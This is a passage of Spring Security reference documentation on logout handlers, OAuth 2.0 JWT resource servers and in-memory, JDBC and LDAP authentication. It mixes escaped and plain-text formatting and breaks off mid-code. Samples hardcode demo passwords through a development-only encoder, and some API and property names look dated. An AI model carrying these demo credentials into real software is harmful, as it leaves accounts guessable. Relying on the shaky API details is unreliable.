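LogoutSuccessHandler logoutSuccessHandler = new SimpleUrlLogoutSuccessHandler();
LogoutHandler logoutHandler = new SecurityContextLogoutHandler();
// hypothetical cookie names; use whatever cookies your application actually issues
String[] cookieNamesToClear = new String[] { "JSESSIONID", "remember-me" };
----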
`CookieClearingLogoutHandler` explicitly.\n\n[NOTE]\n====\nLogouts can of course also be configured using the XML Namespace notation.\nPlease see the documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section for further details.\n====\n\nGenerally, in order to customize logout functionality, you can add\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nand\/or\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutSuccessHandler.html[LogoutSuccessHandler]`\nimplementations.\nFor many common scenarios, these handlers are applied under the\ncovers when using the fluent API.\n\n[[jc-logout-handler]]\n=== LogoutHandler\n\nGenerally, `{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nimplementations indicate classes that are able to participate in logout handling.\nThey are expected to be invoked to perform necessary clean-up.\nAs such, they should not throw exceptions.\nVarious implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/PersistentTokenBasedRememberMeServices.html[PersistentTokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/TokenBasedRememberMeServices.html[TokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/CookieClearingLogoutHandler.html[CookieClearingLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/csrf\/CsrfLogoutHandler.html[CsrfLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SecurityContextLogoutHandler.html[SecurityContextLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/HeaderWriterLogoutHandler.html[HeaderWriterLogoutHandler]\n\nPlease see <<remember-me-impls>> for details.\n\nInstead of providing `LogoutHandler` implementations directly, the fluent API also provides shortcuts that provide the respective `LogoutHandler` implementations under the covers.\nE.g. 
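As a concrete example of wiring one of the implementations listed above, a `HeaderWriterLogoutHandler` can be registered so that a `Clear-Site-Data` header is written on logout. A sketch, assuming Spring Security 5.1+ where `ClearSiteDataHeaderWriter` is available:

[source,java]
----
import org.springframework.security.web.authentication.logout.HeaderWriterLogoutHandler;
import org.springframework.security.web.header.writers.ClearSiteDataHeaderWriter;
import static org.springframework.security.web.header.writers.ClearSiteDataHeaderWriter.Directive.ALL;

http
	.logout(logout ->
		logout
			// ask the browser to clear cookies, storage and cache on logout
			.addLogoutHandler(new HeaderWriterLogoutHandler(new ClearSiteDataHeaderWriter(ALL)))
	);
----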
`deleteCookies()` allows specifying the names of one or more cookies to be removed on logout success.\nThis is a shortcut compared to adding a `CookieClearingLogoutHandler`.\n\n[[jc-logout-success-handler]]\n=== LogoutSuccessHandler\n\nThe `LogoutSuccessHandler` is called after a successful logout by the `LogoutFilter`, to handle e.g.\nredirection or forwarding to the appropriate destination.\nNote that the interface is almost the same as the `LogoutHandler` but may raise an exception.\n\nThe following implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SimpleUrlLogoutSuccessHandler.html[SimpleUrlLogoutSuccessHandler]\n- HttpStatusReturningLogoutSuccessHandler\n\nAs mentioned above, you don't need to specify the `SimpleUrlLogoutSuccessHandler` directly.\nInstead, the fluent API provides a shortcut by setting the `logoutSuccessUrl()`.\nThis will setup the `SimpleUrlLogoutSuccessHandler` under the covers.\nThe provided URL will be redirected to after a logout has occurred.\nThe default is `\/login?logout`.\n\nThe `HttpStatusReturningLogoutSuccessHandler` can be interesting in REST API type scenarios.\nInstead of redirecting to a URL upon the successful logout, this `LogoutSuccessHandler` allows you to provide a plain HTTP status code to be returned.\nIf not configured a status code 200 will be returned by default.\n\n[[jc-logout-references]]\n=== Further Logout-Related References\n\n- <<ns-logout, Logout Handling>>\n- <<test-logout, Testing Logout>>\n- <<servletapi-logout, HttpServletRequest.logout()>>\n- <<remember-me-impls>>\n- <<csrf-logout, Logging Out>> in section CSRF Caveats\n- Section <<cas-singlelogout, Single Logout>> (CAS protocol)\n- Documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section\n\n\ninclude::oauth2-client.adoc[]\n\ninclude::oauth2-login.adoc[]\n\n\n[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using https:\/\/tools.ietf.org\/html\/rfc7519[JWT]-encoded OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens].\n\nThis is handy in circumstances where an application has federated its authority management out to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by Resource Servers to validate authority when serving requests.\n\n[NOTE]\n====\nA complete working example can be found in {gh-samples-url}\/boot\/oauth2resourceserver[*OAuth 2.0 Resource Server Servlet sample*].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nTo specify which authorization server to use, simply do:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n```\n\nWhere `https:\/\/idp.example.com` is the value contained in the `iss` claim for JWT tokens 
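Note that in many Spring Boot versions this property is rooted under the `spring.` prefix (that is, `spring.security.oauth2.resourceserver.jwt.issuer-uri`); verify the exact root against your Boot version. The same issuer can also be supplied programmatically; a minimal sketch using the `JwtDecoders` factory:

```java
@Bean
public JwtDecoder jwtDecoder() {
    // builds a decoder from the Provider Configuration endpoint of this issuer
    return JwtDecoders.fromOidcIssuerLocation("https://idp.example.com");
}
```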
that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that `https:\/\/idp.example.com\/.well-known\/openid-configuration` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration endpoint, `https:\/\/idp.example.com\/.well-known\/openid-configuration`, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT token, Resource Server will\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWTs header\n2. Validate the JWTs `exp` and `nbf` timestamps and the JWTs `iss` claim, and\n3. 
Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate the JWT tokens.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support the Provider Configuration endpoint, or if Resource Server must be able to start up independently from the authorization server, then `issuer-uri` can be exchanged for `jwk-set-uri`:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n```\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nHowever, it will also no longer validate the `iss` claim in the JWT (since Resource Server no longer knows what the issuer value should be).\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server:\n\n```java\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n}\n```\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n```java\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n```\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromOidcIssuerLocation(issuerUri);\n}\n```\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\n[[oauth2resourceserver-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured 
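Because the principal is a `Jwt`, handler methods can receive it directly. A sketch, assuming Spring MVC and the `@AuthenticationPrincipal` argument resolver:

```java
@GetMapping("/whoami")
public String whoami(@AuthenticationPrincipal Jwt jwt) {
    // the sub claim, which Authentication#getName also maps to
    return jwt.getSubject();
}
```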
<<oauth2resourceserver-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n```\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n```\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-validation,validation>>, <<oauth2resourceserver-claimsetmapping,mapping>>, or <<oauth2resourceserver-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n}\n```\n\n[[oauth2resourceserver-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n }\n}\n```\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) 
{}\n```\n\n[[oauth2resourceserver-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(grantedAuthoritiesExtractor())\n )\n );\n }\n}\n\nConverter<Jwt, AbstractAuthenticationToken> grantedAuthoritiesExtractor() {\n return new GrantedAuthoritiesExtractor();\n}\n```\n\nwhich is responsible for converting a `Jwt` into an `Authentication`.\n\nWe can override this quite simply to alter the way granted authorities are derived:\n\n```java\nstatic class GrantedAuthoritiesExtractor extends JwtAuthenticationConverter {\n protected Collection<GrantedAuthority> extractAuthorities(Jwt jwt) {\n Collection<String> authorities = (Collection<String>)\n jwt.getClaims().get(\"mycustomclaim\");\n\n return authorities.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n```\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n```java\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n```\n\n[[oauth2resourceserver-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n```\n\n[NOTE]\nBy default, Resource Server configures a 
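The `CustomAuthenticationToken` used above is only referenced, never defined. One hypothetical shape for it, extending `AbstractAuthenticationToken`:

```java
static class CustomAuthenticationToken extends AbstractAuthenticationToken {
    private final Jwt jwt;

    CustomAuthenticationToken(Jwt jwt) {
        // illustrative fixed authority; a real token would derive these from the JWT
        super(AuthorityUtils.createAuthorityList("ROLE_USER"));
        this.jwt = jwt;
        setAuthenticated(true);
    }

    public Object getCredentials() {
        return this.jwt.getTokenValue();
    }

    public Object getPrincipal() {
        return this.jwt;
    }
}
```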
clock skew of 30 seconds.\n\n[[oauth2resourceserver-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n```java\npublic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"invalid_token\", \"The required audience is missing\", null);\n\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n```\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = new AudienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same 
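The `lookupUserIdBySub` reference above is application-specific. A hypothetical converter that swaps the token subject for an internal user id (the `userRepository` collaborator and its `findIdBySubject` method are assumptions, not part of Spring Security):

```java
private Object lookupUserIdBySub(Object sub) {
    // hypothetical lookup against an application-owned user store
    return this.userRepository.findIdBySubject((String) sub);
}
```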
API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).restOperations(rest).build());\n return jwtDecoder;\n}\n```\n\n[[jc-authentication]]\n== Authentication\n\nThus far we have only taken a look at the most basic authentication configuration.\nLet's take a look at a few slightly more advanced options for configuring authentication.\n\n[[jc-authentication-inmemory]]\n=== In-Memory Authentication\n\nWe have already seen an example of configuring in-memory authentication for a single user.\nBelow is an example to configure multiple users:\n\n[source,java]\n----\n@Bean\npublic UserDetailsService userDetailsService() throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\treturn manager;\n}\n----\n\n[[jc-authentication-jdbc]]\n=== JDBC Authentication\n\nYou can find the updates to support JDBC based authentication.\nThe example below assumes that you have already defined a `DataSource` within your application.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/jdbc[jdbc-javaconfig] sample provides a complete example of using JDBC based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\/\/ 
ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tauth\n\t\t.jdbcAuthentication()\n\t\t\t.dataSource(dataSource)\n\t\t\t.withDefaultSchema()\n\t\t\t.withUser(users.username(\"user\").password(\"password\").roles(\"USER\"))\n\t\t\t.withUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\"));\n}\n----\n\n=== LDAP Authentication\n\nYou can find the updates to support LDAP based authentication.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/ldap[ldap-javaconfig] sample provides a complete example of using LDAP based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\tauth\n\t\t.ldapAuthentication()\n\t\t\t.userDnPatterns(\"uid={0},ou=people\")\n\t\t\t.groupSearchBase(\"ou=groups\");\n}\n----\n\nThe example above uses the following LDIF and an embedded Apache DS LDAP instance.\n\n.users.ldif\n----\ndn: ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: groups\n\ndn: ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: people\n\ndn: uid=admin,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Rod Johnson\nsn: Johnson\nuid: admin\nuserPassword: password\n\ndn: uid=user,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Dianne Emu\nsn: Emu\nuid: user\nuserPassword: password\n\ndn: cn=user,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: user\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\nuniqueMember: uid=user,ou=people,dc=springframework,dc=org\n\ndn: cn=admin,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: admin\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\n----\n\n[[jc-authentication-authenticationprovider]]\n=== AuthenticationProvider\n\nYou can define custom authentication by exposing a custom `AuthenticationProvider` as a bean.\nFor example, the following will customize authentication assuming that `SpringAuthenticationProvider` implements `AuthenticationProvider`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated\n\n[source,java]\n----\n@Bean\npublic SpringAuthenticationProvider springAuthenticationProvider() {\n\treturn new SpringAuthenticationProvider();\n}\n----\n\n[[jc-authentication-userdetailsservice]]\n=== UserDetailsService\n\nYou can define custom authentication by exposing a custom `UserDetailsService` as a bean.\nFor example, the following will customize authentication assuming that `SpringDataUserDetailsService` implements `UserDetailsService`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated and no `AuthenticationProviderBean` is defined.\n\n[source,java]\n----\n@Bean\npublic SpringDataUserDetailsService springDataUserDetailsService() {\n\treturn new SpringDataUserDetailsService();\n}\n----\n\nYou can also customize how passwords are encoded by exposing a `PasswordEncoder` as a bean.\nFor example, if you use bcrypt you can add a bean definition as shown below:\n\n[source,java]\n----\n@Bean\npublic BCryptPasswordEncoder passwordEncoder() {\n\treturn new 
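The `SpringAuthenticationProvider` mentioned above is only named, never shown. A minimal hypothetical implementation, checking fixed credentials purely for illustration:

[source,java]
----
public class SpringAuthenticationProvider implements AuthenticationProvider {

	@Override
	public Authentication authenticate(Authentication authentication) throws AuthenticationException {
		String username = authentication.getName();
		String password = (String) authentication.getCredentials();
		// hypothetical check; a real provider would consult an external system
		if (!"user".equals(username) || !"password".equals(password)) {
			throw new BadCredentialsException("Invalid credentials");
		}
		return new UsernamePasswordAuthenticationToken(username, password,
				AuthorityUtils.createAuthorityList("ROLE_USER"));
	}

	@Override
	public boolean supports(Class<?> authentication) {
		return UsernamePasswordAuthenticationToken.class.isAssignableFrom(authentication);
	}
}
----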
BCryptPasswordEncoder();\n}\n----\n\n== Multiple HttpSecurity\n\nWe can configure multiple HttpSecurity instances just as we can have multiple `<http>` blocks.\nThe key is to extend the `WebSecurityConfigurerAdapter` multiple times.\nFor example, the following is an example of having a different configuration for URL's that start with `\/api\/`.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class MultiHttpSecurityConfig {\n\t@Bean <1>\n\tpublic UserDetailsService userDetailsService() throws Exception {\n\t\t\/\/ ensure the passwords are encoded properly\n\t\tUserBuilder users = User.withDefaultPasswordEncoder();\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\t\treturn manager;\n\t}\n\n\t@Configuration\n\t@Order(1) <2>\n\tpublic static class ApiWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter {\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.antMatcher(\"\/api\/**\") <3>\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().hasRole(\"ADMIN\")\n\t\t\t )\n\t\t\t\t.httpBasic(withDefaults());\n\t\t}\n\t}\n\n\t@Configuration <4>\n\tpublic static class FormLoginWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t 